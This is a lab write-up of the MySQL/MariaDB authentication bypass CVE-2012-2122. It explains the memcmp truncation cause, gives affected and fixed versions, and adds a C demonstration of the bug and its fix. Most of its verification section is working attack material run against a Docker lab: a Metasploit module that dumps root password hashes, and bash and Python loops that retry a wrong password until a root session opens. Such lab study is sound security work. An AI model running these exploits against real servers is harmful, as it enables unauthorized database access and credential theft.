MySQL Authentication Bypass Vulnerability (CVE-2012-2122)

Vulnerability Overview

When a client connects to MariaDB/MySQL, the password it supplies is compared against the expected password with memcmp(). Because the result of that comparison is handled incorrectly, the server can treat the two passwords as equal even when memcmp() returns a non-zero value.
The root cause is that the server stores the int returned by memcmp() in a one-byte type (my_bool, a plain char), assuming the result always lies in the range -128 to 127. Optimized memcmp() implementations, such as the SSE-optimized version in the GNU C library on Linux, may return any integer whose sign encodes the ordering; whenever that value is a multiple of 256, truncation to a char yields 0 and a wrong password is accepted. The bug is therefore only exploitable on builds linked against such a library (some 64-bit Linux distribution packages were affected, while the official Oracle binaries generally were not), and the chance of triggering it on a single login attempt is roughly 1 in 256, so a few hundred attempts with a wrong password are normally enough.
Affected versions: all MariaDB and MySQL releases before the fixed versions listed below (MySQL 5.5.23, used in the lab environment here, is affected).
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not affected.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected.
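The truncation described above, as an added example that is not code from the original post or from MySQL itself. The my_bool typedef and SHA1_HASH_SIZE follow MySQL's definitions; opt_memcmp is a constructed stand-in for an optimized memcmp() that returns values outside the char range; check_scramble_vuln and check_scramble_fixed are simplified stand-ins for MySQL's check_scramble() that just compare two hash buffers (the real function first recomputes the hash from the scramble); the two 20-byte hash strings are constructed sample input.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original post or from MySQL. It shows
 * the CVE-2012-2122 pattern: the int returned by memcmp() was stored in
 * my_bool, which MySQL defines as a plain char. */

typedef char my_bool;          /* MySQL's definition */
#define SHA1_HASH_SIZE 20      /* length of the compared scramble hashes */

/* Constructed stand-in for an optimized memcmp(). Like the SSE versions in
 * glibc, it only promises that the sign of the result encodes the ordering;
 * here the difference of the first unequal byte is scaled by 256, so every
 * non-zero result is a multiple of 256. */
static int opt_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *x = a, *y = b;
    for (size_t i = 0; i < n; i++)
        if (x[i] != y[i])
            return ((int)x[i] - (int)y[i]) * 256;
    return 0;
}

/* Vulnerable shape (MySQL <= 5.5.23): returning an int through a char keeps
 * only the low byte, so 256, -512, ... become 0, which the caller reads as
 * "hashes match". A return value of 0 means the password was accepted. */
static my_bool check_scramble_vuln(const unsigned char *stored,
                                   const unsigned char *computed)
{
    return opt_memcmp(stored, computed, SHA1_HASH_SIZE);
}

/* Fixed shape (MySQL 5.5.24+ / MariaDB 5.5.23+): normalise the comparison
 * to 0 or 1 before it is narrowed, so only a true 0 means "match". */
static my_bool check_scramble_fixed(const unsigned char *stored,
                                    const unsigned char *computed)
{
    return opt_memcmp(stored, computed, SHA1_HASH_SIZE) != 0;
}

/* What a memcmp()-style int becomes after the narrowing to my_bool. */
static int narrowed(int memcmp_result)
{
    return (my_bool)memcmp_result;
}

/* How many ints in [lo, hi] narrow to 0: over a full 16-bit range it is
 * 256 of 65536, which is where the "about 1 in 256" figure comes from. */
static int count_zero_narrowings(int lo, int hi)
{
    int n = 0;
    for (int v = lo; v <= hi; v++)
        if (narrowed(v) == 0)
            n++;
    return n;
}

/* Constructed sample input: two 20-byte "hashes" differing in one byte.
 * Returns 1 if the check under test accepts the wrong hash, else 0. */
static int wrong_hash_accepted(int use_fixed_check)
{
    unsigned char stored[SHA1_HASH_SIZE], computed[SHA1_HASH_SIZE];
    memcpy(stored,   "correct-hash-bytes!!", SHA1_HASH_SIZE);
    memcpy(computed, "correct-hash-bytes??", SHA1_HASH_SIZE);
    my_bool r = use_fixed_check ? check_scramble_fixed(stored, computed)
                                : check_scramble_vuln(stored, computed);
    return r == 0;
}

int main(void)
{
    printf("(my_bool)256 = %d, (my_bool)-512 = %d, (my_bool)1 = %d\n",
           narrowed(256), narrowed(-512), narrowed(1));
    printf("ints in [-32768,32767] that narrow to 0: %d\n",
           count_zero_narrowings(-32768, 32767));
    printf("vulnerable check accepts wrong hash: %d\n", wrong_hash_accepted(0));
    printf("fixed check accepts wrong hash:      %d\n", wrong_hash_accepted(1));
    return 0;
}
```

With the system memcmp() the outcome depends on which implementation the binary was linked against, which is why the same MySQL version is exploitable on some Linux builds and not on others; the stand-in above simply makes the out-of-range case deterministic so the truncation can be seen in isolation.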

Environment Setup

The environment is the ready-made vulhub Docker image.
Configuration: MySQL (version 5.5.23), account/password: root/123456

Verification

metasploit

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 192.168.31.23
RHOSTS => 192.168.31.23
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.31.23:3306    - 192.168.31.23:3306 The server allows logins, proceeding with bypass test
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Successfully bypassed authentication after 64 attempts. URI: mysql://root:ZoSnI@192.168.31.23:3306
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Hash Table has been saved: /root/.msf4/loot/20190714220813_default_192.168.31.23_mysql.hashes_963184.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

bash
Repeatedly try a wrong password; on a vulnerable build one of the attempts is accepted and the interactive client opens (replace IP with the target address):
for i in `seq 1 1000`; do mysql -u root --password=bad -h IP 2>/dev/null; done

root@kali:~# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.31.23 2>/dev/null; done
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 6065
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| test               |
+--------------------+
4 rows in set (0.00 sec)

MySQL [(none)]>

python
Code

#!/usr/bin/python
# a.py
import subprocess

# Keep retrying a wrong password against the target (replace IP with its
# address). On a vulnerable build roughly one attempt in 256 is accepted,
# at which point the interactive mysql client opens on the "mysql" database.
while 1:
    rc = subprocess.Popen("mysql -u root mysql -h IP --password=baah", shell=True).wait()
    if rc == 0:  # the client exited cleanly, i.e. a login was accepted
        break

Output

root@kali:~# python a.py 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
......
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 8064
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [mysql]>

References:
https://www.freebuf.com/vuls/3815.html
https://www.jianshu.com/p/909bfe51c468